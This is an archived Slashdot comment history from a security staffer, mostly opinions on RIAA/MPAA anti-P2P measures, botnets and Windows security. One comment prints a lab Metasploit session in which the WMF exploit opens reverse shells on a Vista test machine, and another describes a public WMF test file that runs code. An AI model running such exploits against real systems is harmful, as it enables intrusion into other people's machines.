Slashdot Mirror


User: blast3r

blast3r's activity in the archive.

Stories: 0
Comments: 55

Comments · 55

  1. Re:What is the next headline? on Leaked MediaDefender Emails Show Student P2P Traffic Down · · Score: 1

    "Hopefully more data can be gathered and published showing not only what the real numbers are, but how the RIAA/MPAA get their numbers"

    This is what I am hoping. I have no idea how the **AAs get their numbers. The numbers from the leaked MediaDefender emails are just a small sample but I hope this sparks some interest in someone finding out what the numbers really are.

  2. Re:don't worry about how many... on FBI's Bot Roast II Sees Great Success · · Score: 2, Insightful

    I just now realized I don't know what "Score:5, Informative" means on /. anymore. Shouldn't this be rated 'funny'?

  3. Taosecurity Analysis on MPAA College Toolkit Raises Privacy, Security Concerns · · Score: 1

    Some interesting facts.

    http://taosecurity.blogspot.com/2007/11/examining-mpaa-university-toolkit.html

    They are using an old version of snort that has vulnerabilities. I didn't realize the version of snort they are running is from over two years ago!

    I sure hope this version they are running isn't vulnerable to this. http://www.kb.cert.org/vuls/id/175500 If so, someone could totally own the box and sniff whatever traffic they want to. All of it including the content.

  4. Re:Homer on Anti-P2P College Bill Moving Through House · · Score: 3, Interesting

    You should get a big kick out of this then.

    http://listserv.educause.edu/cgi-bin/wa.exe?A2=ind0711&L=icpl&T=0&F=&S=&P=546

    This tool they are talking about includes numerous network based tools they want Universities to install on their network. These tools CAN NOT detect ILLEGAL file sharing. They can only detect that file sharing is taking place. So what are Universities supposed to do? Watch the logs and when someone shares a file launch a raid on their room to check and see if that file was illegal or not? This is ridiculous.

    Now the scary part. The Universitytoolkit is set up by default to allow unauthenticated access to the tools on the box via a web application. Someone from the network can anonymously view ALL traffic this system can see which includes web traffic, etc. If anyone has installed this toolkit you might want to do some more research.

  5. Re:Enough with the spin on First RIAA Case Victim Finally Speaks Out · · Score: 1

    I decided to just create my own music. :)

    Here, download my music. It is free!

    GarageBand.com has a TON of great free music. Most allow download of the MP3 as well.

    Garageband

  6. Re:Enough with the spin on First RIAA Case Victim Finally Speaks Out · · Score: 1

    The RIAA didn't ask for $220,000. The stupid jurors came up with that number.

  7. Re:Tag goodforher ! on Mom Sues Music Company Over Baby Video Removal · · Score: 1

    Now wait a minute! Wouldn't Prince be happy that this mother has PURCHASED one of his CDs?! The quality of the sound on the video could hardly hurt his sales. If anything it would increase them. Maybe that is why he raised such a stink in the first place. Hoping to get some controversy started and him being in the spotlight would generate more sales. I just lost all kinds of respect for him. Prince!! HAVE YOU LOST YOUR MIND?!

  8. Re:Calling all lawyers on Video Professor Sues 100 Anonymous Critics · · Score: 1

    holy crap. what a totally dumb ass move on VP's side. he needs some new lawyers and advisors. that is going to be a nightmare to his future sales!!!

  9. Re:wrong? on Man Wins Partial Victory In Circuit City Arrest · · Score: 0, Flamebait

    JUST SHOW THE GODDAMN RECEIPT!! for christ's sake. This was stoopid.

  10. Re:This WASN'T an "Apple WiFi hack"! on Hacker Publishes Notorious Apple Wi-Fi Attack · · Score: 1

    During the actual exploit didn't you notice the MAC address was not a third party but was one for Apple?

    IP Address was 192.168.1.50
    MAC address was 00:17:F2:41:31:6D

    MAC Address Prefix    Vendor
    0017F2                Apple Computer

    This was covered but a lot of people either didn't see it or just chose to ignore it. I am going to bet he did that ifconfig on purpose knowing that people that really pay attention will see that. Or he did that to just throw confusion in the whole deal.

    http://www.smallworks.com/archives/00000461.htm
    http://www.smallworks.com/~jim/maynor_exploit_video.mov

    And for a little humour

    me$ whois microsoftie.com
    Registrant:
    Microsoft Corporation
    One Microsoft Way
    Redmond, WA 98052
    US

    Domain name: MICROSOFTIE.COM

    Administrative Contact:
    Administrator, Domain domains@microsoft.com
    One Microsoft Way
    Redmond, WA 98052
    US
    +1.4258828080

  11. University of Pennsylvania doesn't filter content on Web Censorship on the University Campus? · · Score: 1

    Research and learning is what we are about and I don't see that content such as this will ever be blocked. MP3s can be used for more than just music. They can also be used for presentations of useful information. There are other ways to deal with bandwidth problems such as throttling (if that is their concern) but that would then impact the speedy delivery of information they need to obtain. Maybe they need a more robust connection to the Internet.

  12. Re:Well Duh! on The BBC's Honeypot PC · · Score: 1

    Wow, I didn't even know this article was going to be published. I actually sent him documentation I created to help him get the honeypot set up. Seems they did a REALLY good job with it! I'm kind of thinking a small mention with kudos to me in the article would have been nice but I'm not going to lose any sleep over it. The honeypot idea originated after I had followed a BOT to a Botnet controller that Diabl0 was 'managing' and they did a story on it. So they wanted to set up their own honeypot. It would have been nice if he at least sent me an email saying the story was coming out. :(

  13. Deploying images for later malicious use on Banner Ad on Myspace Serves Adware to 1 Million · · Score: 1

    Another thing to think about with this type of exploit is what the future will hold for us. Since we already know that in the future there will be new vulnerabilities discovered in image viewers, media players, flash players, etc, evil people will begin to distribute embedded links to files in advance where they can then come back later if an exploit is released and replace the file with a malicious one. For instance, if you create all those cute flashy images that myspacers seem to use in comments and host them on a site later you can come back and simply replace the image with an evil one. Same goes for shockwave or other media files as well. Just something to think about!

  14. Re:Not to worry on Ambidextrous Linux/Windows Virus · · Score: 1

    TGIF is all i have to say. :) too tired to be playing /. today i guess.

  15. Re:Not to worry on Ambidextrous Linux/Windows Virus · · Score: 1

    >linux viruses do not exist huh? Linux.Plupii Linux.Slapper.Worm Linux.Simile Linux.Backdoor.Kaiten just to name a few.

  16. Re:I'm confused.. on The New Face of Script Kiddiez · · Score: 2, Informative

    uhmmm.. the botnet dood didn't register this domain. Well, now poor Timothy is going to have a busy week.

  17. Re:I'm confused.. on The New Face of Script Kiddiez · · Score: 2, Insightful

    Ever tried to track these guys down? Have at it and let us know what you find out. =) First of all the term 'our authorities' sticks out. There isn't a single jurisdiction for this type of crime. A lot of these botnet operators live overseas and are hard to track down. Then if they do actually find them there are a lot of hurdles to jump through. The number of botnets is growing every day and I would guess that the number of law enforcement that deal with cybercrimes isn't growing at the same pace. This is already a huge problem and I would imagine it will only get worse.

  18. Re:New Face on The New Face of Script Kiddiez · · Score: 4, Insightful

    When you chase these botnet controllers down you may find the operator in a channel on the server but normally they hide their real IP address. There is only so much you can do if you don't have access to the actual system the IRC server is located on. And even then it could be difficult to actually find them because they could be proxying through another hacked machine.

  19. Re:Consider the source... on First Mac OS X Virus? · · Score: 1

    Sophos posted an advisory as well.
    http://www.sophos.com/virusinfo/analyses/osxleapa.html

  20. Re:Misleading headline on Microsoft Won't Offer Patch Before Worm Strikes? · · Score: 1

    Yea, someone else ended up saying the same thing and is rated 'insightful' and mine 'off topic'. go figure that out. anyways, a single infection on a network can cause a lot of grief if they have departmental shared network drives. would be good to make sure the backup of server shares is complete before midnight on Feb 02.

  21. Misleading headline on Microsoft Won't Offer Patch Before Worm Strikes? · · Score: 2, Informative

    "will not release a patch until its regular monthly patch release" Someone should have researched this a bit before approving it. Microsoft has no obligation to patch this. This is a worm that relies mainly on users opening up an evil email attachment. What is M$ supposed to patch? The end-user?

  22. Re:Cant wait... on First Windows Vista Security Update Released · · Score: 3, Interesting

    Yes, I did order Macs for all of our staff (except for one that already has a Mac) so that means we will have 4 Macs in the office.

    I have used Microsoft since DOS 4.0 as well as other operating systems. This is the first time I got nervous just surfing the web. There has always been some kind of workaround. In this case there wasn't a good workaround for the zero day exploits that were all over the place. The crappy workaround M$ recommended wasn't a good workaround at all. If you disabled the crappy dll they suggested it is still possible for you to get compromised. There has been talk that some other programs would re-register the crappy dll and any images you had stored in memory would be executed. Microsoft downplayed this just a bit too much for me. We have over 35,000 computers and we had students coming back the Friday before patch-tuesday. So, this was pretty bad. They did end up releasing the patch that Friday. Okay, I can live with that. *whew*

    Now, the fact that this same vulnerability was found in the new and secure Windows Vista just did it for me. That was the point I stopped being a Microsoft advocate.

    Yours truly,

    blast3r the newb

  23. Re:Cant wait... on First Windows Vista Security Update Released · · Score: 5, Informative

    I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!

    People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.

    Administrator

    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://10.1.1.101:8080/
    [*] HTTP Client connected from 10.1.1.106:49450, redirecting...
    [*] HTTP Client connected from 10.1.1.106:49451, redirecting...
    [*] HTTP Client connected from 10.1.1.106:49452, redirecting...
    [*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
    [*] Got connection from 10.1.1.101:4321 10.1.1.106:49454

    Microsoft Windows [Version 6.0.5112]
    (C) Copyright 1985-2005 Microsoft Corp.

    E:\Users\Administrator\Desktop>

    Test account

    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://10.1.1.101:8080/
    [*] HTTP Client connected from 10.1.1.106:49487, redirecting...
    [*] HTTP Client connected from 10.1.1.106:49488, redirecting...
    [*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
    [*] Got connection from 10.1.1.101:4321 10.1.1.106:49490

    Microsoft Windows [Version 6.0.5112]
    (C) Copyright 1985-2005 Microsoft Corp.

    E:\Users\test\Desktop>

    I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!

  24. Re:Vista and WMF Vulnerability on Going Deep Inside Vista's Kernel Architecture · · Score: 1

    I just rolled back my Vista VMWare (Microsoft Windows [Version 6.0.5112]) guest and created a new account called 'test' and logged into it. I went to http://sipr.net/%5Bremove%5Dtest.wmf which is a test that will see if your system is vulnerable. As soon as I loaded the page Microsoft Picture Viewer popped up and then calculator popped up. Then Internet Explorer crashed. So, the code in the WMF file was executed under a normal user and brought up calculator and then crashed explorer.

  25. Re:Vista and WMF Vulnerability on Going Deep Inside Vista's Kernel Architecture · · Score: 1

    I was using VMWare and last night when I retested under another account I can't remember if I had rolled back the snapshot. I'll try this again today if I get a chance. It is still bad if M$ is bringing in older technology that may have problems like this. The fact still remains that Windows Vista is vulnerable to this even if it is only under the Administrator account.